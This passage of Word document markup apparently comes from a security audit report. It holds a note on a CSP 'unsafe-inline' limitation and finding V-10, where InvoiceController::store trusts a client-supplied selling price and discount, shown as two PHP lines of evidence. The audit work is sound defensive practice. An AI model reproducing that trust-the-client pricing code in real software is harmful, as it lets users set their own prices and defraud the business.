                                  <a:pt x="923925" y="126454"/>
                                  <a:pt x="922995" y="128699"/>
                                  <a:pt x="921135" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="919275" y="132420"/>
                                  <a:pt x="917030" y="133350"/>
                                  <a:pt x="914400"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33788B4" id="Group 27004" o:spid="_x0000_s1026" style="position:absolute;margin-left:153.7pt;margin-top:-.95pt;width:72.75pt;height:10.5pt;z-index:-251413504" coordsize="9239,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3qWTQMAAKAJAAAOAAAAZHJzL2Uyb0RvYy54bWykVttunDAQfa/Uf0C8N4DZ3Swou5HaXF6q&#10;NmrSD/AasyABRrb31q/veMAGdqOoTfKwMZ45czkzHvvm9lhX3p5LVYpm5UdXoe/xhomsbLYr//fL&#10;w5el7ylNm4xWouEr/8SVf7v+/Onm0KaciEJUGZceGGlUemhXfqF1mwaBYgWvqboSLW9AmAtZUw2f&#10;chtkkh7Ael0FJAwXwUHIrJWCcaVg964T+mu0n+ec6Z95rrj2qpUPsWn8lfi7Mb/B+oamW0nbomR9&#10;GPQdUdS0bMCpM3VHNfV2srwwVZdMCiVyfcVEHYg8LxnHHCCbKDzL5lGKXYu5bNPDtnU0AbVnPL3b&#10;LPuxf5Ttc/skgYlDuwUu8Mvkcsxlbf5DlN4RKTs5yvhReww2ExInZO57DERRHMfznlJWAO8XKFbc&#10;v4kLrNNgEsqhheZQQ/7qY/k/F7TlSKtKIf8n6ZXZyifhIva9htbQpajh4Q7SgnqOJJUq4OtjDLlM&#10;acp2Sj9ygVTT/Xelu57M7IoWdsWOjV1K6Ow3e7ql2uBMlGbpHYZaFa5URlqLPX8RqKdNwZK5qaet&#10;NMQ5KFTNRDGazUI4UyNVq8B2m5J95X+m6tdhPFKHuDp/UUKuO48JyDH5XkKiKO4k5DqJjAjCmdqe&#10;flkcSZION1vMEeec9e0KMS+WyWLqretkECEFr3mz+Vk/DhGReAm0dRir9XpsI8xiNp9NQ3CBR2S5&#10;SJKp0LERxeF8jsJ/42NgOIrJjExJjlxZxufX1saVeBBe+LT59hjbPxOE1XmNE6hEV60BYesF9eta&#10;5jJwaAkr+j82+ia8ZLg3R87LYvdHJZ6mYZPrCOjURz1kxVPQWPmiF/sYz9vX5fxf58GReHa+HO/T&#10;hrD1w92LYrNKKN71uZkreCTdrEHtYZpVjRk7wAejcLXnFdV4R9alhju/KmuYQ+Q6hBlizw1YM7O+&#10;G6+40qeKm9lUNb94DnMa7yGzoeR2862S3p6amx3/0Dit2oL2u73dXhVDRTsGn5dV5UxGCJ2YvL97&#10;IA84ICCpXtngOD4qHDLskKyPpntZwP0MSdv3BeAdCD2LRjt8A68iDHOUrVluRHbCOxkJgcsPqcFn&#10;AObRP1nMO2P8jVrDw2r9FwAA//8DAFBLAwQUAAYACAAAACEAKiDg4+AAAAAJAQAADwAAAGRycy9k&#10;b3ducmV2LnhtbEyPTU/DMAyG70j8h8hI3LY0+wBWmk7TBJwmJDYkxC1rvLZa41RN1nb/HnOCmy0/&#10;ev282Xp0jeixC7UnDWqagEAqvK2p1PB5eJ08gQjRkDWNJ9RwxQDr/PYmM6n1A31gv4+l4BAKqdFQ&#10;xdimUoaiQmfC1LdIfDv5zpnIa1dK25mBw10jZ0nyIJ2piT9UpsVthcV5f3Ea3gYzbObqpd+dT9vr&#10;92H5/rVTqPX93bh5BhFxjH8w/OqzOuTsdPQXskE0GubJ44JRDRO1AsHAYjnj4cjkSoHMM/m/Qf4D&#10;AAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250&#10;ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAv&#10;AQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEATgd6lk0DAACgCQAADgAAAAAAAAAAAAAAAAAu&#10;AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAKiDg4+AAAAAJAQAADwAAAAAAAAAAAAAA&#10;AACnBQAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAALQGAAAAAA==&#10;">
                <v:shape id="Shape 2063" o:spid="_x0000_s1027" style="position:absolute;width:9239;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="9239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MijxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvBf9DeEIvpSYqrLIapRSEgiJ0q/X62LzuLt28rEnU7b9vhEKPw8x8wyzXvW3FlXxoHGsYjxQI&#10;4tKZhisNh4/N8xxEiMgGW8ek4YcCrFeDhyXmxt34na5FrESCcMhRQx1jl0sZyposhpHriJP35bzF&#10;mKSvpPF4S3DbyolSmbTYcFqosaPXmsrv4mI1fKoz+f1hlh2L3anbqqx8OjdzrR+H/csCRKQ+/of/&#10;2m9Gw0RlU7i/SU9Arn4BAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAsWzIo8YAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m9525,l914400,v2630,,4875,930,6735,2791c922995,4651,923925,6896,923925,9525r,114300c923925,126454,922995,128699,921135,130559v-1860,1861,-4105,2791,-6735,2791l9525,133350v-2630,,-4875,-930,-6735,-2791c930,128699,,126454,,123825l,9525c,6896,930,4651,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,923925,133350"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Known limitation:</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style-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> retains </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'unsafe-inline</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Tailwind and the print templates emit inline style attributes, and removing it needs a nonce-based build pipeline. Residual risk is CSS injection, not script execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06281C52" w14:textId="77777777" w:rsidR="00287B7F" w:rsidRDefault="00287B7F" w:rsidP="001244A6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="24"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="727B67A4" w14:textId="2ED395D7" w:rsidR="001244A6" w:rsidRPr="005C54CB" w:rsidRDefault="001244A6" w:rsidP="001244A6">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V-10 · The client dictated the selling price, and the discount workflow was decorative</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0343E130" w14:textId="77777777" w:rsidR="001244A6" w:rsidRPr="005C54CB" w:rsidRDefault="001244A6" w:rsidP="001244A6">
      <w:pPr>
        <w:spacing w:after="161"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A04:2021 Insecure Design / API6:2023 · </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CWE-602</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CWE-807</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High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E22A369" w14:textId="697FCEDB"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This is easy to misread as safe. The server </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1ADC2BE8" wp14:editId="0B8D29A4">
                <wp:extent cx="6480126" cy="1066800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="26039" name="Group 26039"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6480126" cy="1066800"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6480126" cy="1066800"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="980" name="Shape 980"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="257175"/>
                            <a:ext cx="6480126" cy="542925"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="6480126" h="542925">
                                <a:moveTo>
                                  <a:pt x="19050" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="6467474" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6470001" y="0"/>
                                  <a:pt x="6472430" y="484"/>
                                  <a:pt x="6474764" y="1451"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="5034"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="537890"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6474764" y="541468"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6472430" y="542435"/>
                                  <a:pt x="6470001" y="542925"/>
                                  <a:pt x="6467474" y="542925"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="19050" y="542925"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="16524" y="542925"/>
                                  <a:pt x="14094" y="542435"/>
                                  <a:pt x="11760" y="541468"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="9426" y="540507"/>
                                  <a:pt x="7366" y="539130"/>
                                  <a:pt x="5580" y="537344"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3793" y="535558"/>
                                  <a:pt x="2417" y="533493"/>
                                  <a:pt x="1450" y="531161"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="523875"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="19050"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1450" y="11757"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2417" y="9426"/>
                                  <a:pt x="3793" y="7367"/>
                                  <a:pt x="5580" y="5581"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="7366" y="3795"/>
                                  <a:pt x="9426" y="2418"/>
                                  <a:pt x="11760" y="1451"/>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991" name="Rectangle 991"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="8837"/>
                            <a:ext cx="736976" cy="148374"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="16C249D2" w14:textId="77777777" w:rsidR="001244A6" w:rsidRDefault="001244A6" w:rsidP="001244A6">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="0B2D56"/>
                                </w:rPr>
                                <w:t>Evidence.</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="992" name="Rectangle 992"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="554236" y="8837"/>
                            <a:ext cx="43855" cy="148374"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3696BB55" w14:textId="77777777" w:rsidR="001244A6" w:rsidRDefault="001244A6" w:rsidP="001244A6">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="993" name="Shape 993"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="590550" y="0"/>
                            <a:ext cx="1447800" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1447800" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1438275" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1440905" y="0"/>
                                  <a:pt x="1443150" y="930"/>
                                  <a:pt x="1445010" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1446870" y="4651"/>
                                  <a:pt x="1447800" y="6902"/>
                                  <a:pt x="1447800" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1447800" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1447800" y="126454"/>
                                  <a:pt x="1446870" y="128699"/>
                                  <a:pt x="1445010" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1443150" y="132420"/>
                                  <a:pt x="1440905" y="133350"/>
                                  <a:pt x="1438275" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133350"/>
                                  <a:pt x="4650" y="132420"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="0" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6902"/>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994" name="Rectangle 994"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="614214" y="23657"/>
                            <a:ext cx="1860507" cy="140101"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4F9D6EA4" w14:textId="77777777" w:rsidR="001244A6" w:rsidRDefault="001244A6" w:rsidP="001244A6">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:proofErr w:type="spellStart"/>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>InvoiceController</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>::</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>store</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="995" name="Rectangle 995"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2040136" y="8837"/>
                            <a:ext cx="2945282" cy="148374"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="65AA5D59" w14:textId="77777777" w:rsidR="001244A6" w:rsidRDefault="001244A6" w:rsidP="001244A6">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> took the unit price straight off the request:</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="25502" name="Rectangle 25502"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="402682"/>
                            <a:ext cx="217310" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="53CBFC04" w14:textId="77777777" w:rsidR="001244A6" w:rsidRDefault="001244A6" w:rsidP="001244A6">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>:62</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="25504" name="Rectangle 25504"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="264147" y="402682"/>
                            <a:ext cx="3621825" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="539019BE" w14:textId="77777777" w:rsidR="001244A6" w:rsidRDefault="001244A6" w:rsidP="001244A6">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">   $</w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>sellingPrice</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> = (float) $item['</w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>selling_price</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>'];</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="25505" name="Rectangle 25505"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="574132"/>
                            <a:ext cx="217310" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5A386444" w14:textId="77777777" w:rsidR="001244A6" w:rsidRDefault="001244A6" w:rsidP="001244A6">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>:63</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="25506" name="Rectangle 25506"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="264147" y="574132"/>
                            <a:ext cx="3766698" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="406B612A" w14:textId="77777777" w:rsidR="001244A6" w:rsidRDefault="001244A6" w:rsidP="001244A6">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">   $discount     = (float) ($item['discount'</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 xml:space="preserve"> 0);</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1003" name="Shape 1003"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4524374" y="933450"/>
                            <a:ext cx="400050" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="400050" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="390525" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="393155" y="0"/>
                                  <a:pt x="395401" y="930"/>
                                  <a:pt x="397260" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="399120" y="4651"/>
                                  <a:pt x="400050" y="6896"/>
                                  <a:pt x="400050" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="400050" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="400050" y="126454"/>
                                  <a:pt x="399120" y="128693"/>
                                  <a:pt x="397260" y="130553"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="395401" y="132414"/>
                                  <a:pt x="393155" y="133344"/>
                                  <a:pt x="390525" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133344"/>
                                  <a:pt x="4650" y="132414"/>
                                  <a:pt x="2790" y="130553"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128693"/>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inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
